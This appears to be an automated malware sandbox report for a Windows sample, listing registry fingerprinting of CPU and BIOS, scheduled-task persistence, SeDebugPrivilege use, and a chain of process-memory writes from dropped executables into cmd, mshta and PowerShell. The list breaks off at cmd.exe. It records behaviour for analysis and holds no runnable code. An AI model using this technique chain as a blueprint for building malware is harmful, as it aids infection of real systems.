Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108850101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\bxagwdt\nharnrr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108910101\25225dec3b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108940101\afe4448849.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108800101\nhDLtPT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108860101\v6Oqdnc.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10108830101\mAtJWNv.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10108830101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133856982989643006" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Z3O3F86JTR4WB47OW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Z3O3F86JTR4WB47OW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempDOCRR6GVSRO5TP7833AJ47MPPWB8SWEE.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\TempDOCRR6GVSRO5TP7833AJ47MPPWB8SWEE.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\ProgramData\bxagwdt\nharnrr.exe N/A
N/A N/A C:\ProgramData\bxagwdt\nharnrr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108840101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108840101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108840101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108840101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108840101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108850101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108850101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108850101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108850101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108860101\v6Oqdnc.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10108840101\ce4pMzk.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10108920101\b7b3518f4b.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\notepad.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\notepad.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Z3O3F86JTR4WB47OW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\240adb43ac.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\240adb43ac.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\240adb43ac.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2760 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe C:\Users\Admin\AppData\Local\Temp\Z3O3F86JTR4WB47OW.exe
PID 2760 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe C:\Users\Admin\AppData\Local\Temp\Z3O3F86JTR4WB47OW.exe
PID 2760 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe C:\Users\Admin\AppData\Local\Temp\Z3O3F86JTR4WB47OW.exe
PID 1192 wrote to memory of 1088 N/A C:\Users\Admin\AppData\Local\Temp\Z3O3F86JTR4WB47OW.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 1192 wrote to memory of 1088 N/A C:\Users\Admin\AppData\Local\Temp\Z3O3F86JTR4WB47OW.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 1192 wrote to memory of 1088 N/A C:\Users\Admin\AppData\Local\Temp\Z3O3F86JTR4WB47OW.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 1088 wrote to memory of 3960 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 1088 wrote to memory of 3960 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 1088 wrote to memory of 3960 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 3960 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 3960 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 3960 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 1088 wrote to memory of 3280 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108470101\240adb43ac.exe
PID 1088 wrote to memory of 3280 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108470101\240adb43ac.exe
PID 1088 wrote to memory of 3280 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108470101\240adb43ac.exe
PID 3280 wrote to memory of 3680 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\240adb43ac.exe C:\Windows\SysWOW64\cmd.exe
PID 3280 wrote to memory of 3680 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\240adb43ac.exe C:\Windows\SysWOW64\cmd.exe
PID 3280 wrote to memory of 3680 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\240adb43ac.exe C:\Windows\SysWOW64\cmd.exe
PID 3280 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\240adb43ac.exe C:\Windows\SysWOW64\mshta.exe
PID 3280 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\240adb43ac.exe C:\Windows\SysWOW64\mshta.exe
PID 3280 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\240adb43ac.exe C:\Windows\SysWOW64\mshta.exe
PID 3680 wrote to memory of 2964 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3680 wrote to memory of 2964 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3680 wrote to memory of 2964 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 5040 wrote to memory of 4692 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5040 wrote to memory of 4692 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5040 wrote to memory of 4692 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5048 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 5048 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 5048 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 1088 wrote to memory of 1028 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 1088 wrote to memory of 1028 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 1088 wrote to memory of 1028 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 1028 wrote to memory of 1408 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1028 wrote to memory of 1408 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1028 wrote to memory of 1408 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1028 wrote to memory of 1476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1028 wrote to memory of 1476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1028 wrote to memory of 1476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1476 wrote to memory of 820 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1476 wrote to memory of 820 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1476 wrote to memory of 820 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1028 wrote to memory of 3420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1028 wrote to memory of 3420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1028 wrote to memory of 3420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3420 wrote to memory of 4320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3420 wrote to memory of 4320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3420 wrote to memory of 4320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1028 wrote to memory of 2184 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1028 wrote to memory of 2184 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1028 wrote to memory of 2184 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2184 wrote to memory of 948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2184 wrote to memory of 948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2184 wrote to memory of 948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1028 wrote to memory of 1768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1028 wrote to memory of 1768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1028 wrote to memory of 1768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1028 wrote to memory of 4972 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 1028 wrote to memory of 4972 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 1028 wrote to memory of 4972 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 4972 wrote to memory of 2760 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4972 wrote to memory of 2760 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4972 wrote to memory of 2760 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1088 wrote to memory of 668 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe

"C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe"

C:\Users\Admin\AppData\Local\Temp\Z3O3F86JTR4WB47OW.exe

"C:\Users\Admin\AppData\Local\Temp\Z3O3F86JTR4WB47OW.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\10108470101\240adb43ac.exe

"C:\Users\Admin\AppData\Local\Temp\10108470101\240adb43ac.exe"

C:\Windows\SysWOW64\cmd.exe

